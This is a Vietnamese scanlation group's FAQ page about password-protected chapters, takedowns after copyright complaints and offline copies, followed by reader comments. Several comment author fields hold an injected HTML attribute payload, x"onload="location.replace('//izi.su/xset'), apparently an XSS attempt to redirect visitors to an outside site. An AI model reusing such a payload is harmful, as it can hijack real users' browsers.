21/07/2024

FAQs (pass)

Đọc truyện nhà tui để lại bình luận cho tui nha :33

Câu hỏi thường gặp:

1. Em đọc một số truyện có pass, nhưng không biết pass ở đâu và không biết cách nhập?

 • Pass mở truyện được đặt ở mục lục, pass truyện nào thì gợi ý pass ở mục lục truyện đó, mỗi truyện có một nơi giới thiệu truyện và tổng hợp các chap, đó là mục lục, pass mở mục lục là tên miền website Hắc ám chi các. Gợi ý pass chap gắn ở chữ ‘pass’ màu cam ngay bên cạnh số chap, hoặc có các bộ chap chung thì bọn mình cũng chú thích ngay ở đó rồi nên các bạn chú ý một chút là thấy. Các ký tự pass đề được khoanh tròn màu đỏ hoặc tô đậm hoặc giấu ở đâu đó trong pic gợi ý.
 • Tiếp theo là về cách nhập, chỉ có những bạn nhập pass không đúng thì mới không mở được chap thôi, nên không có chuyện em nhập đúng mà vẫn không vào được nhé. 

2. Em có thể theo dõi nhóm bằng những phương tiện nào?

3. Avatar của nhóm là nhân vật nào của bộ truyện nào?

 • Hai nhân vật trong hình là Itou và Ikou trong Manga Sayonara Game (Vol1) và Change World (Vol2) của tác giả Minaduki Yuu bạn nhé, còn là nhân vật phụ trong Love Nest luôn. Đây có thể nói là pj đầu tiên Hắc ám chi các dịch và hoàn, couple Itou và Ikou cũng là 2 nhân vật trải qua toàn bộ quá trình ra đời và phát triển của Hắc ám chi các, bọn mình đặc biệt dành tình cảm cho họ, cũng để kỉ niệm sự ‘ra đời’ của nhóm nên hình đã được chỉnh sửa thành trang credit của nhóm và được cài làm avt của nhóm luôn. Và nếu bạn theo dõi Hắc ám chi các đủ lâu sẽ nhận ra, avt của page nhóm chưa bao giờ thay đổi, dù trả qua nhiều lần sập rồi lại lập ^^

4. Nhóm drop bộ ABC rồi hả? Em thấy lâu rồi không ra chap mới?

 • Ở trang chủ của bọn mình có một list các truyện bị drop nhé mn, các bộ không ở trong danh sách đó thì vẫn đang ở trạng thái ongoing. Lâu không ra chap mới có thể là vì không có bản Anh hay bản raws để dịch hoặc có thể là bọn mình đang bận chạy các Pj khác, đầu truyện nhà mình rất nhiều nên mong các bạn thông cảm vấn đề này. 1 năm 2 năm không thành vấn đề, nếu cảm thấy quá sức bọn mình sẽ thông báo drop, còn không bọn mình nhất định sẽ quay lại làm tiếp vào một ngày nào đó.
 • Đừng quên là cũng có cả list hoàn nữa, hãy ghé qua list hoàn thành của nhà mình.

5. Làm thế nào để đăng ký thông báo trên website ạ? Em đăng ký rồi nhưng không nhận được thông báo?

 • Bọn mình có một phần như thế này, bạn ấn vào oke là đã bật chức năng nhận thông báo khi có chap mới từ website của bọn mình

 • Còn tại sao ấn oke rồi mà vẫn không nhận được thông báo, có lẽ cái này là do cài đặt trình duyệt web hay cài đặt điện thoại của các bạn. Máy tính của mình cũng chap nhận được chap không nhưng điện thoại của mình là androi thì cứ có chap mới là nhận được nhé. Các bạn nên kiểm tra các loại cài đặt xem có chặn cái gì không và bật nó lên là được. Hoặc vẫn không thể chỉnh sửa thì hãy theo dõi fanpage Hac_am_chi_các hoặc mục ‘Bài đăng mới nhất’ trên web thường xuyên để không bị bỏ lỡ chap mới.

6. Tại sao em ấn vào một số truyện bị Page not found. Làm sao để đọc bây giờ?

 • Có hai loại page not found trên web, một là do bọn mình gắn link ở mục lục bị lỗi, các bạn có thể tự khắc phục tình trạng này bằng việc kéo xuống dưới chút để thấy tổng hợp danh sách, hầu như link ở đó sẽ không bao giờ bị lỗi, hoặc báo về cho bọn mình qua fanpage hoặc mục chat trên web để bọn mình kiểm tra và chỉnh sửa.
   
 • Tiếp theo là loại page not found do xóa hoặc ẩn truyện. Cái này một là vì truyện đã được việt hóa bản quyền nên xóa khỏi web, nên bọn mình xóa truyện, hai là vì bị bên bản quyền Lezhin report, họ có luật sư tại Việt Nam và bên luật sư đã liên hệ với bọn mình nên bọn mình BUỘC PHẢI ẩn truyện khỏi web nha mn, trong thời gian ẩn này các bạn sẽ gặp tình trạng page not found. Bao giờ có thể đọc lại thì mình không chắc, mong Lezhin chỉ hợp tác với bên luật sư một thời gian thôi, bao giờ hết hạn hợp đồng thì bọn mình lại mở lại -_- hoặc không thì tại file offline cho các bạn tải về đọc nhé. Nhưng tạo file off rất lâu, nên sẽ tốn thời gian lắm, các bạn có mong muốn tải thì nhắn cho bọn mình, hiện tại bọn mình đang tạo cho King’s Maker.

7. Em muốn recommend truyện này, nhóm có thể xem xét được không?

 • Tất nhiên rồi, bạn có thể gửi confession cho bọn mình theo link bên trên, nhớ ghi đầy đủ tên và link gốc của truyện để bọn mình có thể tìm đọc nhé. Nếu bạn có thể giới thiệu qua nội dung một chút thì càng tốt. Xin cảm ơn.
Đọc truyện nhà tui để lại bình luận cho tui nha :33
Đăng ký
Thông báo
guest
791 Comments
Mới nhất
Cũ nhất Được quan tâm nhất
Inline Feedbacks
View all comments
Cốt đây

Sao mình tìm mãi hông thấy phần mục lục của truyện tân lang bị đánh mất vậy shop giúp mình với thèm lắm rồi

Khách vô tri

Sao tui nhập mãi mà vẫn ko dô đc vậy,

x"onload="location.replace('//izi.su/xset')

tttrtveer

Last edited 3 months ago by x"onload="location.replace('//izi.su/xset')
x"onload="location.replace('//izi.su/xset')

rdty

Last edited 3 months ago by x"onload="location.replace('//izi.su/xset')
Kiko Tika

Ad ơi, mong ad cân nhắc thầu bộ này của tác giả Hyeu, nét vẽ đẹp xỉu luôn huhu
Với bộ Ghost Door nữa :((((

Screenshot_20240105_195703_X
Jess

Mik ko tìm đc pass của bộ cặn bã ai giúp mik với:_)

Duong

Ai giải giúp mình pass bộ cuồng nhiệt với. Mình thử mãi không được

Chem

Cái chỗ để mình nhập pass vô là ở đâu vậy mấy ní